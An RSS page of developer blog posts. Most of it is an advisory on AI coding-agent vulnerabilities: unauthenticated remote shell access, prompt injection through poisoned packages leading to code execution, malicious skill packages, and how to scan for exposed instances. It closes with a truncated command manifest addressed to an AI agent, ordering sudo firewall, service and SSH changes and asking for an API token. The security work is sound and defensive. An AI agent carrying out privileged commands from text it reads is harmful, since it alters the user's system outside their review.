MoreRSS

site iconThe Practical DeveloperModify

A constructive and inclusive social network for software developers.
Please copy the RSS to your reader, or quickly subscribe to:

Inoreader Feedly Follow Feedbin Local Reader

Rss preview of Blog of The Practical Developer

This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control

2026-03-31 06:35:45

This was the week AI security stopped being theoretical.

Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.

1. OpenAI Codex: Command Injection via Branch Names

BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.

The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.

The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.

OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary.

Every AI coding tool that touches git has this same attack surface. Basically nobody is auditing for it.

2. LiteLLM Supply Chain Attack: 47K Downloads in 46 Minutes

On March 24, 2026, litellm version 1.82.8 was published to PyPI with a malicious .pth file that executed automatically on every Python process startup.

The payload: a multi-stage credential stealer targeting AI pipelines and cloud secrets. The same threat actor (TeamPCP) had already compromised Trivy, KICS, and Telnyx across five supply chain ecosystems.

The timeline:

  • 13 minutes between the compromised publish and detection
  • 47,000 downloads before the package was pulled
  • 95 million monthly downloads for the litellm package overall

This is the package that most AI proxy servers use. If you're routing API calls through litellm (and many vibe-coded apps do), you were exposed.

Endor Labs just published their analysis showing this is the same attacker behind the Trivy and KICS compromises. This is a coordinated campaign targeting AI infrastructure specifically.

3. Claude Gets Computer Use: The Closed Loop

Anthropic released Computer Use for Claude Code. Claude can now open your apps, click through your UI, and test what it built, all from the CLI.

The capability is impressive. The security implications are sobering.

With Computer Use, the feedback loop is fully closed: Claude writes code, runs it, tests it visually, finds bugs, fixes them, deploys. No human in the loop checking if:

  • Auth middleware actually works
  • API keys are properly scoped
  • Rate limiting is real
  • Environment variables aren't hardcoded
  • The dependencies being installed are legitimate

This isn't Claude's fault. The tool works as designed. But it means insecure code ships faster than ever, with more confidence, because "it tested itself."

The Pattern

All three events share a common thread: trust boundaries in AI development are poorly defined.

  • Codex trusted user-supplied branch names as safe input
  • Vibe coders trusted pip install litellm as a safe operation
  • Claude Computer Use trusts that the code it wrote is correct because the UI loaded

Meanwhile, 9to5Mac reports that vibe coding has broken Apple's App Store review queue. Wait times are up from less than a day to 3+ days. The volume of AI-generated app submissions has overwhelmed human reviewers.

What comes next is predictable: automated security gates. Apple, Google, and every app marketplace will add automated scanning. Apps with exposed API keys, missing authentication, and hardcoded secrets will get auto-rejected before a human ever looks at them.

What You Can Do Today

If you're shipping vibe-coded apps:

  1. Pin your dependencies. Use lockfiles. Verify hashes. Don't pip install without knowing exactly what version you're getting.

  2. Treat AI-generated code as untrusted input. Review it the way you'd review a PR from a new hire. The code works, but "works" and "secure" are different things.

  3. Scan before shipping. Tools like VibeCheck scan your GitHub repos and deployed URLs for the common vibe coding mistakes: exposed API keys, missing auth, open endpoints, insecure headers.

  4. Assume your secrets are exposed. If you've ever hardcoded an API key in a vibe-coded project, rotate it now. Not tomorrow. Now.

  5. Add rate limiting to every public endpoint. The bots are faster than your users.

The AI coding revolution is real. The security crisis is also real. They're the same thing.

I track vibe coding security tools and incidents at notelon.ai. Free scanner, no signup required.

I automated competitor price tracking with Python (saved 4 hours per week)

2026-03-31 06:35:34

I automated competitor price tracking with Python (saved 4 hours per week)

Was spending every Monday morning checking 23 competitor product pages. Copy URL, open tab, scroll to price, write it down. Repeat. 3 hours 47 minutes gone on average.

Decided to automate it.

The manual process was killing me

Running a small e-commerce thing on the side. Needed to stay competitive on pricing. But manually checking prices across Amazon, eBay, and niche sites? Tedious as hell.

Spreadsheet had columns for:

  • Product name
  • Competitor URL
  • Current price
  • Last updated

Every. Single. Week. Manually.

First attempt: just scrape it

Thought I'd write a quick script. Grab HTML, parse price, done.

import requests
from bs4 import BeautifulSoup

url = "https://example.com/product/123"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
price = soup.find('span', class_='price').text

Worked for maybe 3 sites. Then:

  • Amazon blocked me (User-Agent issue)
  • JavaScript rendered prices didn't show up
  • Some sites had weird HTML structures

Back to manual checking. Annoying.

Ended up fixing it in a couple of ways

Split the problem:

Amazon/eBay (big sites): Used existing scraper APIs instead of fighting detection. Thought I could beat Amazon's bot detection myself. I couldn't. ParseForge has Amazon product scrapers that handle that stuff already. Saved me from spending a week on proxy rotation.

Small sites: Basic requests + BeautifulSoup worked fine. These sites don't have serious bot detection.

Storage: Just appended to CSV. Thought about Postgres or something fancier. Then I realized weekly price checks = maybe 1,200 rows per year. CSV opens in Excel. Done.

Script looks something like:

import csv
import requests
from datetime import datetime

# Small site scraping
def get_basic_price(url, selector):
    try:
        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'})
        soup = BeautifulSoup(response.text, 'html.parser')
        price_text = soup.select_one(selector).text
        # Clean: "$19.99" -> 19.99
        return float(price_text.replace('$', '').replace(',', '').strip())
    except:
        return None

# Amazon/big sites: use API
def get_amazon_price(product_id):
    # Call scraper API here
    # Returns structured data (price, title, rating, etc.)
    pass

# Weekly run
products = [
    {'name': 'Widget A', 'url': 'https://smallsite.com/widget-a', 'selector': '.price'},
    {'name': 'Widget B', 'asin': 'B08XYZ123', 'platform': 'amazon'},
]

results = []
for product in products:
    if 'asin' in product:
        price = get_amazon_price(product['asin'])
    else:
        price = get_basic_price(product['url'], product['selector'])

    results.append({
        'product': product['name'],
        'price': price,
        'date': datetime.now().strftime('%Y-%m-%d'),
    })

# Save to CSV
with open('competitor_prices.csv', 'a', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['product', 'price', 'date'])
    writer.writerows(results)

Now runs every Monday via cron. Takes 47 seconds instead of 4+ hours.

Couple things that made it actually work

Don't fight big sites

  • Amazon/eBay have serious anti bot stuff
  • Using existing tools (APIs, scrapers) beats debugging proxies for weeks
  • Small sites? Basic requests works fine

Error handling matters more than I thought

  • If one site fails, script continues with the rest
  • Logs failures to separate file
  • I check errors once a month (most are just temporary site changes)

CSV is good enough

  • Opens in Excel
  • Fast enough for weekly checks
  • No database maintenance

Stuff I'd change

Honestly would add:

  • Price change alerts (email when competitor drops >10%)
  • Chart generation (see trends)
  • More product categories

But current version does the job. 4 hours back per week.

Try it yourself

Basic approach:

  1. List your competitor URLs
  2. Figure out price selectors (browser inspector)
  3. Use requests for simple sites
  4. Use APIs/tools for complex sites (Amazon, eBay)
  5. Save to CSV
  6. Cron it

ParseForge has scrapers for Amazon, eBay, Walmart if you're tracking those. Handles the annoying stuff tho you still gotta clean the data yourself.

Went from manual Monday drudgery to automated. Worth the weekend it took to build.

Your AI Coding Agent Has Root Access to Your Machine. Does Anything Else?

2026-03-31 06:30:41

TL;DR

Two critical vulnerabilities — CVE-2026-22812 (CVSS 8.8) and CVE-2026-22813 (CVSS 9.6) — affect the most widely deployed open-source AI coding agent platforms. 220,000+ instances are exposed on the public internet with no authentication. 15,200 are confirmed vulnerable to unauthenticated remote code execution. But the exposure isn't limited to cloud servers — the same agent running on your Mac Mini under your desk has the same root-level access to your files, your credentials, and your network. This article provides the technical analysis, the exposure data, remediation for both VPS and local hardware deployments, and a 5-layer defense architecture that works regardless of where your agent runs.

The machine under your desk

Apple cannot keep the Mac Mini in stock. The M4 and M4 Pro configurations are backordered across most retailers, and the reason is not what Apple planned for. Developers are buying them to run AI coding agents locally — specifically OpenClaw, which needs Apple Silicon's unified memory architecture for local LLM inference.

The logic makes sense on paper. A $600 Mac Mini with 16GB of unified memory runs a 7B parameter model fast enough for real-time coding assistance. A $1,400 M4 Pro with 48GB runs 34B models comfortably. No cloud costs. No API rate limits. No data leaving your network. Private, fast, and owned.

There is one problem. The agent running on that Mac Mini has the same privileges as the user who launched it. On most developer machines, that means:

  • Full read/write access to ~/ — every project, every .env file, every SSH key
  • Access to the macOS Keychain if unlocked
  • Ability to install packages, modify system files, and execute arbitrary shell commands
  • Network access to every service on the local network — NAS drives, printers, other machines
  • No sandboxing, no firewall rules, no permission boundaries

A Meta security researcher had to physically unplug her Mac Mini to stop an AI coding agent from deleting her email inbox. The agent was running with full system permissions and connected to a compromised skill package. It began executing destructive commands that could not be stopped through the UI because the WebSocket connection was being used by the attacker's injected scripts.

That incident happened on a local machine with no internet exposure. The attack vector was not a network exploit — it was a malicious package in the agent's skill chain.

For the 220,000+ instances running on VPS infrastructure with no authentication and no firewall, the same attack can be executed remotely by anyone on the internet.

The industry spent two months talking about the 220,000 number. What it missed is that the number only counts servers. It does not count the desks.

Two CVEs, one architectural failure

CVE-2026-22812: Unauthenticated Remote Code Execution

CVE ID: CVE-2026-22812
CVSS Score: 8.8 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Software: OpenCode HTTP server (serve mode), OpenClaw instances
Discovery: Reported via NVD/NIST, confirmed by SecurityScorecard STRIKE team

When an AI coding agent runs in serve mode — exposing an HTTP and WebSocket interface for browser-based interaction — the server binds to 0.0.0.0 by default. In versions prior to 1.1.10, this server has no authentication mechanism whatsoever. Even in 1.1.10+, where the server is disabled by default, enabling it provides only optional Basic Auth that most deployments skip.

Any process on the network — or anyone on the internet if the server is publicly reachable — can:

  1. Execute arbitrary shell commands with the user's full privileges
  2. Read and write any file accessible to the running process
  3. Install packages, modify system configurations, exfiltrate data
  4. Pivot to other services running on the same host or network

The agent is not a code assistant. It is a full remote shell with an AI interface.

On a VPS: If port 4096 is open, the entire internet has root access.
On a Mac Mini: If the agent binds to 0.0.0.0 instead of 127.0.0.1, every device on the local network has root access. On a coffee shop WiFi, a coworking space, a hotel — that is everyone in the room.

CVSS vector breakdown

Component Value Meaning
Attack Vector Network Exploitable remotely
Attack Complexity Low No special conditions required
Privileges Required None No authentication needed
User Interaction None No victim action required
Scope Unchanged Stays within the vulnerable component
Confidentiality High Full read access
Integrity High Full write access
Availability High Full denial of service possible

This is a trivially exploitable vulnerability. If the port is reachable, the system is compromised.

CVE-2026-22813: XSS-to-RCE via LLM Output

CVE ID: CVE-2026-22813
CVSS Score: 9.6 (Critical)
Affected Software: OpenClaw web UI

The web interface that renders AI agent output does not sanitize the markdown and HTML returned by the language model. An attacker who can influence the LLM's output — through prompt injection, malicious context documents, or compromised training data — can inject arbitrary JavaScript that executes in the user's browser session.

Because the browser session has an active WebSocket connection to the agent backend, this JavaScript can send commands to the agent as if the user typed them, exfiltrate the contents of the current session, execute shell commands through the agent's execution interface, and persist across sessions if the injected script writes to the agent's context files.

This is the vulnerability that matters most for Mac Mini owners. CVE-2026-22812 requires network access to the agent's port. CVE-2026-22813 does not. It requires only that the agent processes a file, package, or repository that contains adversarial content. Given that AI coding agents routinely clone repositories, install npm/pip/cargo packages, read documentation files, and process code review comments — the attack surface is every piece of content the agent interacts with.

The Mac Mini on your desk. Running a local model. No cloud connection. Still vulnerable to CVE-2026-22813 through a poisoned package.json or a malicious code review comment.

The exposure data

Between January and March 2026, multiple independent security research groups conducted internet-wide scans targeting AI coding agent infrastructure:

Finding Count Source
OpenClaw instances exposed on public internet 220,000+ Censys, Bitsight, Penligent
Instances confirmed vulnerable to RCE (CVE-2026-22812) 15,200 Penligent
Instances correlated with prior breach activity 53,300 SecurityScorecard STRIKE team
Malicious packages in ClawHub skill marketplace 1,184 CyberDesserts
Leaked API tokens (Supabase breach) 1,500,000 Infosecurity Magazine
Leaked email addresses (same breach) 35,000 Infosecurity Magazine

These numbers are the ones that made the news. They count VPS deployments — Hetzner, DigitalOcean, Linode, Contabo — where a developer provisioned a server, installed the agent, started serve mode, and did not configure a firewall.

What they do not count: Mac Minis on home networks. Development laptops in coworking spaces. Workstations in offices with flat network topologies. These machines are not indexed by Censys. They are not visible to Shodan. But if the agent's HTTP server binds to anything other than 127.0.0.1, every device on the same network segment has the same unauthenticated access that the internet has to those 220,000 VPS instances.

The 220,000 number is a floor. The actual exposure includes every unsandboxed AI coding agent running on every machine where the developer has not explicitly configured network isolation. The Mac Mini shortage suggests that number is growing, not shrinking.

The supply chain problem

The 1,184 malicious packages discovered in the ClawHub skill marketplace represent a systemic supply chain compromise. These packages masqueraded as legitimate MCP skills but contained credential harvesters, reverse shells, cryptominers, and data exfiltration routines.

This is the attack path that bypasses all network-level defenses. A tunnel does not help if the agent itself installs a malicious package that reads ~/.ssh/id_rsa and uploads it to an attacker's server. A firewall does not help if the package phones home through an outbound HTTPS connection that looks identical to a legitimate API call.

Defense requires both network isolation (Layers 1–3) and permission scoping (Layer 5). Neither alone is sufficient.

Why this happened

The root cause is not a coding error. It is an architectural assumption.

AI coding agents were designed as local development tools. They assume a trusted network — your laptop, your home WiFi. The HTTP server is a convenience feature: start the agent, open a browser tab, start coding.

That assumption fails in two directions simultaneously:

Direction 1: Servers. Developers run agents on VPS infrastructure because they need persistent execution, shared team access, and GPU availability. The agent's HTTP server, designed for localhost, is now reachable from the public internet. This produced the 220,000 exposed instances.

Direction 2: Local hardware at scale. The Mac Mini shortage proves that developers are deploying AI agents on physical hardware in volumes that matter. These machines sit on home networks, office networks, and coffee shop WiFi. They are not behind firewalls. They are not running in sandboxes. The agent has the same access to the filesystem, the network, and the macOS Keychain that the developer does. The difference from the VPS scenario is visibility — no one is scanning home networks, so the exposure goes unreported.

Both directions share the same gap: the tooling provided zero infrastructure guidance. No documentation for firewall configuration. No reverse proxy templates. No authentication integration. No sandboxing guide for macOS. No permission scoping.

Developers were told "start the server and open a browser." They did.

Reproduction methodology

The following describes the verification methodology used by researchers. This information is provided for defensive purposes — to help teams verify whether their own instances are vulnerable.

For VPS deployments

Step 1: Use Censys, Shodan, or any internet-facing port scanner to identify hosts running the agent's HTTP server. The default port is 4096. The server responds with a distinctive HTTP response that includes WebSocket upgrade headers and the agent's UI HTML.

GET / HTTP/1.1
Host: <target-ip>:4096

A vulnerable instance returns a 200 response with the full agent interface. There is no login page. There is no authentication challenge.

Step 2: Connect to the WebSocket endpoint. The agent accepts commands in its standard message format. Any command that the agent can execute — file operations, shell commands, package installations — is available to the attacker.

Step 3: Send a benign verification command (e.g., whoami, hostname, uname -a). If the agent returns system information, the instance is confirmed vulnerable.

Important: Do not execute destructive commands. Do not access, copy, or modify any data. Verification should confirm the vulnerability exists and stop. Report findings to the instance owner if identifiable.

For local hardware (Mac Mini, workstations)

Step 1: On the machine running the agent, check what address the server is bound to:

# macOS
lsof -i :4096

# Linux
ss -tlnp | grep 4096

If the output shows *:4096 or 0.0.0.0:4096, the agent is listening on all network interfaces — not just localhost. Any device on the same network can connect.

Step 2: From another device on the same network (phone, laptop, tablet), open a browser and navigate to http://<mac-mini-ip>:4096. If the agent's interface loads, the machine is exposed to the local network.

Step 3: Check what the agent process has access to:

# What user is running the agent?
whoami

# What files are readable?
ls ~/

# Is the macOS Keychain accessible?
security list-keychains

# Are SSH keys present?
ls ~/.ssh/

# Are environment variables set with API keys?
env | grep -i key

In the majority of local installations, the agent runs as the primary user account — which means full access to the home directory, all development projects, all SSH keys, and all environment variables containing API credentials.

Remediation: 5-layer defense-in-depth

The following architecture addresses both CVEs at the infrastructure level. The first three layers apply to VPS deployments. All five layers apply to any deployment, including local hardware.

Layer 1: Network isolation — eliminate the public attack surface

For VPS deployments:

Use an outbound-only encrypted tunnel instead of opening inbound ports. Cloudflare Tunnel (cloudflared) establishes a connection from your server to Cloudflare's network using outbound-only QUIC connections on port 7844. No inbound ports are opened. The server's IP address is never exposed. All traffic routes through Cloudflare's 330+ city anycast network.

# Install cloudflared
curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
  | gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
  https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
  | tee /etc/apt/sources.list.d/cloudflared.list
apt update && apt install cloudflared

# Create tunnel (requires Cloudflare API token)
cloudflared tunnel create my-agent-tunnel

# Configure: route agent.yourdomain.com → localhost:4096
# Catch-all: return 404 for all other hostnames

Configuration note: Set the tunnel's catch-all to http_status:404. This ensures that any request arriving at Cloudflare that does not match your specific hostname is rejected before it reaches your server.

For Mac Mini / local hardware:

Force the agent to bind to 127.0.0.1 only — never 0.0.0.0. This restricts the HTTP server to connections originating from the same machine.

# If the agent supports a bind address flag:
opencode serve --host 127.0.0.1

# Verify it's not listening on all interfaces:
lsof -i :4096
# Should show: 127.0.0.1:4096, NOT *:4096

If you need to access the agent from another device (e.g., your laptop connecting to a Mac Mini on your desk), use SSH port forwarding instead of exposing the port:

# From your laptop, forward local port 4096 to the Mac Mini's localhost:4096
ssh -L 4096:127.0.0.1:4096 user@mac-mini-ip

# Then open http://localhost:4096 in your laptop's browser
# Traffic is encrypted through the SSH tunnel — never exposed on the network

For persistent remote access, Cloudflare Tunnel works on macOS as well:

# Install on macOS
brew install cloudflare/cloudflare/cloudflared

# Same tunnel configuration as Linux — agent stays on localhost,
# Cloudflare handles authenticated remote access

What this prevents: On VPS — direct IP scanning, port-based attacks, DDoS. On local hardware — exposure to every device on the same WiFi or LAN. The agent becomes reachable only through authenticated channels.

Layer 2: Identity verification — gate every request

Cloudflare Zero Trust Access enforces authentication at the edge. Before a request is proxied to your tunnel (and therefore your server or Mac Mini), the user must authenticate through an identity provider — Google, GitHub, one-time pin via email, or any SAML/OIDC provider.

Access Policy:
  Action: Allow
  Include: Emails ending in @yourdomain.com
  Session duration: 24 hours
  Cookie: SameSite=None, HttpOnly, Binding=Enabled

Critical configuration for WebSocket agents: The SameSite=None and Binding Cookie settings are required for AI coding agents that use WebSocket connections. Without them, the browser's WebSocket upgrade request will fail the cookie check and the session will drop mid-conversation. This is a common misconfiguration that causes intermittent disconnections.

What this prevents: Unauthorized access from anyone who does not possess valid identity credentials. Even if an attacker discovers the agent's URL, they see a Cloudflare login page — not the agent interface.

Layer 3: Application authentication — defense in depth

Enable authentication on the agent's HTTP server itself as a secondary gate.

# Generate a high-entropy password
AGENT_PASSWORD=$(openssl rand -base64 24)

# Set as environment variable for the agent process
# Linux (systemd):
echo "OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD" >> /etc/systemd/system/opencode.service.d/override.conf
systemctl daemon-reload && systemctl restart opencode

# macOS (launchd or manual):
export OPENCODE_SERVER_PASSWORD=$AGENT_PASSWORD
opencode serve

Important caveat: When Zero Trust Access is active, enabling Basic Auth on the agent server can create an authentication loop (Access redirects on 401, server returns 401 before Access processes). The correct implementation is conditional: set the server password only when Zero Trust is not configured. When Zero Trust is active, it is the authentication layer.

Layer 4: Host hardening — reduce the blast radius

For VPS (Ubuntu/Debian):

# Firewall: deny all inbound, allow SSH only
ufw default deny incoming
ufw default allow outgoing
ufw allow ssh
ufw --force enable
# Port 4096 is NOT opened — all agent traffic goes through the tunnel

# Brute force protection
apt install -y fail2ban
systemctl enable fail2ban

# Kernel hardening
cat >> /etc/sysctl.d/99-hardening.conf << 'EOF'
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_redirects = 0
kernel.randomize_va_space = 2
net.ipv4.conf.all.log_martians = 1
EOF
sysctl --system

# Automatic security updates
apt install -y unattended-upgrades
dpkg-reconfigure -plow unattended-upgrades
Control What it does
UFW (default deny) Blocks all inbound traffic except SSH
fail2ban Bans IPs after repeated failed SSH attempts
SYN cookies Prevents SYN flood denial of service
Reverse path filtering Prevents IP spoofing
ICMP broadcast ignore Prevents Smurf amplification attacks
Redirect rejection Prevents ICMP redirect hijacking
ASLR (full) Randomizes memory addresses to defeat buffer overflow exploits
Martian logging Logs packets with impossible source addresses
Unattended upgrades Automatically applies security patches

For Mac Mini / macOS:

macOS does not need the same kernel hardening (it ships with ASLR, SIP, and Gatekeeper enabled). The priorities are different:

# Enable the macOS firewall
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

# Block all incoming connections (allow only essential services)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on

# Enable stealth mode (don't respond to pings or port scans)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on

# Verify settings
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

Additional macOS-specific hardening:

# Disable Remote Login (SSH) if you don't need it
sudo systemsetup -setremotelogin off

# Disable Remote Management
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \
  -deactivate -configure -access -off

# Enable FileVault (full disk encryption) — critical if the machine is physically accessible
sudo fdesetup enable

# Automatic updates
sudo softwareupdate --schedule on
Control What it does
macOS Firewall (block all) Blocks all incoming connections
Stealth mode Makes the machine invisible to network scans
FileVault Encrypts the entire disk — protects if the machine is stolen
Remote Login off Disables SSH access if not needed
Automatic updates Applies security patches as they ship

Post-deployment: Disable SSH password authentication on both VPS and macOS. Use key-only access:

# Linux
sed -i 's/^PermitRootLogin yes/PermitRootLogin prohibit-password/' /etc/ssh/sshd_config
systemctl restart sshd

# macOS (if SSH is enabled)
sudo sed -i '' 's/^#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo launchctl stop com.openssh.sshd && sudo launchctl start com.openssh.sshd

Layer 5: Scoped permissions — limit what each agent can do

This layer is the one that defends against CVE-2026-22813 and supply chain attacks — the threats that bypass all network-level protection. It applies equally to VPS deployments and Mac Mini setups.

MCP servers — now governed by the Linux Foundation with backing from Anthropic, OpenAI, Google, Microsoft, AWS, and Cloudflare — provide a standardized interface between AI agents and external tools. The critical security feature of MCP is that each server connection can be independently scoped:

  • Read-only agents receive MCP connections with write: false — they can analyze code, run audits, and report findings, but cannot modify files
  • Scoped write agents receive MCP connections limited to specific operations — a deployment agent can interact with Cloudflare Workers but cannot modify DNS records outside its configured zone
  • No-shell agents receive MCP connections with bash: false — they cannot execute arbitrary commands regardless of what the LLM requests
# Example: read-only security auditor
agent:
  name: security-reviewer
  tools:
    write: false
    edit: false
    bash: false
  mcp:
    - cloudflare-docs    # Can read documentation
    - github             # Can read repositories
    # Cannot: deploy, modify, execute

This is not behavioral guardrailing. The agent cannot prompt its way past these restrictions. The MCP server simply does not expose write operations to agents configured as read-only. The permission boundary is enforced at the infrastructure layer, not the prompt layer.

For Mac Mini owners specifically: This layer is your primary defense against supply chain attacks. A malicious package installed by the agent can execute code with the agent's permissions. If the agent has unrestricted filesystem and shell access, the package has unrestricted filesystem and shell access. Scoped MCP permissions mean that even if the agent is tricked into installing a malicious package, the damage is bounded by the agent's configured permission set — not by the user's full system access.

What you should do today

If you run an agent on a VPS

  1. Check exposure now. Run ss -tlnp | grep 4096 — if the port is listening, check if it's reachable from outside. Search Censys or Shodan for your server's IP.
  2. Block the port. ufw deny 4096 — the single fastest remediation.
  3. Set up a tunnel. Cloudflare Tunnel is free. Remove the port from the internet entirely.
  4. Harden the host. Apply kernel parameters, enable fail2ban, enable automatic updates.
  5. Scope your agents. Restrict MCP permissions. Audit agents should be read-only.

If you run an agent on a Mac Mini or local machine

  1. Check the bind address now. Run lsof -i :4096 — if it shows *:4096, your agent is exposed to your entire network.
  2. Force localhost binding. Restart the agent with --host 127.0.0.1.
  3. Enable the macOS firewall. Block all incoming. Enable stealth mode.
  4. Use SSH tunneling for remote access. Never expose the agent's port on the network directly.
  5. Enable FileVault. If someone can physically access the Mac Mini, they should not be able to read the disk.
  6. Scope the agent's permissions. This is your defense against malicious packages and prompt injection. Read-only agents for auditing, scoped agents for deployment.

This month (both platforms)

  1. Monitor for compromise. Check for unauthorized SSH keys in ~/.ssh/authorized_keys. Check for unexpected cron jobs (VPS) or Launch Agents (macOS). Review outbound network connections for unfamiliar destinations.
  2. Audit installed packages. Review what the agent has installed. Check for packages you did not explicitly request.
  3. Review environment variables. If API keys, database credentials, or tokens are in your shell environment, the agent (and any malicious code it executes) has access to all of them. Use a secrets manager or scoped .env files instead of global exports.

Let your agent fix this for you

You just read 4,000 words of vulnerability analysis and remediation steps. Your AI coding agent — the one this article is about — can execute every one of them.

Copy the block below. Paste it into your agent's chat. Say: "Do this."

The agent will read the manifest, execute each step in order, stop when a condition isn't met, and ask you for credentials only when it needs them. It will not guess. It will not skip.

This is how security advisories should work in 2026. Not "read this and figure it out" — but "read this and execute."

Agent-Executable Remediation: CVE-2026-22812 / CVE-2026-22813

## Agent-Executable Remediation Manifest
## CVE-2026-22812 (CVSS 8.8) + CVE-2026-22813 (CVSS 9.6)
## Source: Hodge Luke Digital Intelligence Agency
## Target: Any VPS or macOS machine running an AI coding agent

### INSTRUCTIONS FOR AGENT
Execute each step sequentially. Do not skip steps.
STOP_IF conditions halt execution — explain why to the user and await instructions.
ASK_USER directives require user input before proceeding — do not guess values.
All commands must be run with appropriate privileges (sudo where indicated).
Report the result of each step before moving to the next.

---

### Step 0: Detect platform
Run: uname -s
IF output contains "Darwin" → SET PLATFORM=macos
IF output contains "Linux" → SET PLATFORM=linux
REPORT: "Detected platform: [PLATFORM]"

---

### Step 1: Check if an agent HTTP server is running
IF PLATFORM=linux:
  Run: ss -tlnp | grep -E ':(4096|3000|8080|8888) '
IF PLATFORM=macos:
  Run: lsof -i -P | grep -E ':(4096|3000|8080|8888) .*(LISTEN)'

STOP_IF: No output (no agent server detected — this machine may not be affected)
REPORT: "Found agent server listening on: [port and address]"

IF output shows 0.0.0.0 or *: → REPORT: "WARNING: Agent is bound to all
interfaces — exposed to the network. Proceeding with remediation."
IF output shows 127.0.0.1 only → REPORT: "Agent is bound to localhost only.
Network exposure is limited. Continuing with hardening steps."

---

### Step 2: Block the port immediately
IF PLATFORM=linux:
  Run: sudo ufw status
  IF ufw is inactive:
    Run: sudo ufw default deny incoming
    Run: sudo ufw default allow outgoing
    Run: sudo ufw allow ssh
    Run: sudo ufw --force enable
  Run: sudo ufw deny [detected port from Step 1]
  Run: sudo ufw reload
  REPORT: "Firewall enabled. Port [port] blocked."

IF PLATFORM=macos:
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
  IF firewall is disabled:
    Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockall on
  Run: sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on
  REPORT: "macOS firewall enabled. All incoming blocked. Stealth mode on."

---

### Step 3: Force localhost binding
IF PLATFORM=linux:
  Check if agent is managed by systemd:
    Run: systemctl list-units --type=service | grep -i -E 'opencode|claw'
  IF found:
    REPORT: "Agent is running as systemd service: [service name]"
    ASK_USER: "Should I modify the service to bind to 127.0.0.1 only? (yes/no)"
    IF yes:
      Run: sudo mkdir -p /etc/systemd/system/[service].d
      Write override.conf with Environment="HOST=127.0.0.1"
      Run: sudo systemctl daemon-reload
      Run: sudo systemctl restart [service]

IF PLATFORM=macos:
  REPORT: "On macOS, restart your agent with: --host 127.0.0.1"
  REPORT: "Example: opencode serve --host 127.0.0.1"
  ASK_USER: "What is the command you use to start your agent? I will provide
  the modified command with localhost binding."

---

### Step 4: Install Cloudflare Tunnel (optional but recommended)
ASK_USER: "Do you want to set up a Cloudflare Tunnel for secure remote
access? This requires a Cloudflare account. (yes/no)"

STOP_IF: User says no (skip to Step 5)

ASK_USER: "Please provide your Cloudflare API token with Zone:DNS:Edit and
Account:Cloudflare Tunnel:Edit permissions."
ASK_USER: "What domain do you want to use for accessing the agent?
(e.g., agent.yourdomain.com)"

IF PLATFORM=linux:
  Run: curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg \
    | sudo gpg --dearmor -o /usr/share/keyrings/cloudflare.gpg
  Run: echo "deb [signed-by=/usr/share/keyrings/cloudflare.gpg] \
    https://pkg.cloudflare.com/cloudflared $(lsb_release -cs) main" \
    | sudo tee /etc/apt/sources.list.d/cloudflared.list
  Run: sudo apt update && sudo apt install -y cloudflared

IF PLATFORM=macos:
  Run: brew install cloudflare/cloudflare/cloudflared

Run: cloudflared tunnel login
Run: cloudflared tunnel create agent-tunnel
Write config.yml:
  tunnel: [tunnel-id]
  credentials-file: /root/.cloudflared/[tunnel-id].json
  ingress:
    - hostname: [user-provided domain]
      service: http://localhost:[detected port]
    - service: http_status:404
Run: cloudflared tunnel route dns agent-tunnel [user-provided domain]
Run: cloudflared tunnel run agent-tunnel

REPORT: "Tunnel created. Agent accessible at https://[domain].
No inbound ports required."

---

### Step 5: Harden the host
IF PLATFORM=linux:
  Run: sudo apt install -y fail2ban
  Run: sudo systemctl enable fail2ban

  Write /etc/sysctl.d/99-agent-hardening.conf:
    net.ipv4.tcp_syncookies = 1
    net.ipv4.conf.all.rp_filter = 1
    net.ipv4.icmp_echo_ignore_broadcasts = 1
    net.ipv4.conf.all.accept_redirects = 0
    kernel.randomize_va_space = 2
    net.ipv4.conf.all.log_martians = 1
  Run: sudo sysctl --system

  Run: sudo apt install -y unattended-upgrades
  Run: sudo dpkg-reconfigure -plow unattended-upgrades

  REPORT: "Host hardened: fail2ban active, kernel parameters set,
  automatic security updates enabled."

IF PLATFORM=macos:
  Run: sudo fdesetup status
  IF FileVault is off:
    REPORT: "FileVault (disk encryption) is disabled."
    ASK_USER: "Enable FileVault? This encrypts your entire disk.
    Requires restart. (yes/no)"
    IF yes: Run: sudo fdesetup enable

  Run: sudo softwareupdate --schedule on
  REPORT: "macOS hardened: firewall active, stealth mode on,
  automatic updates enabled."

---

### Step 6: Disable SSH password authentication
IF PLATFORM=linux:
  Run: grep -E '^PasswordAuthentication' /etc/ssh/sshd_config
  IF set to yes:
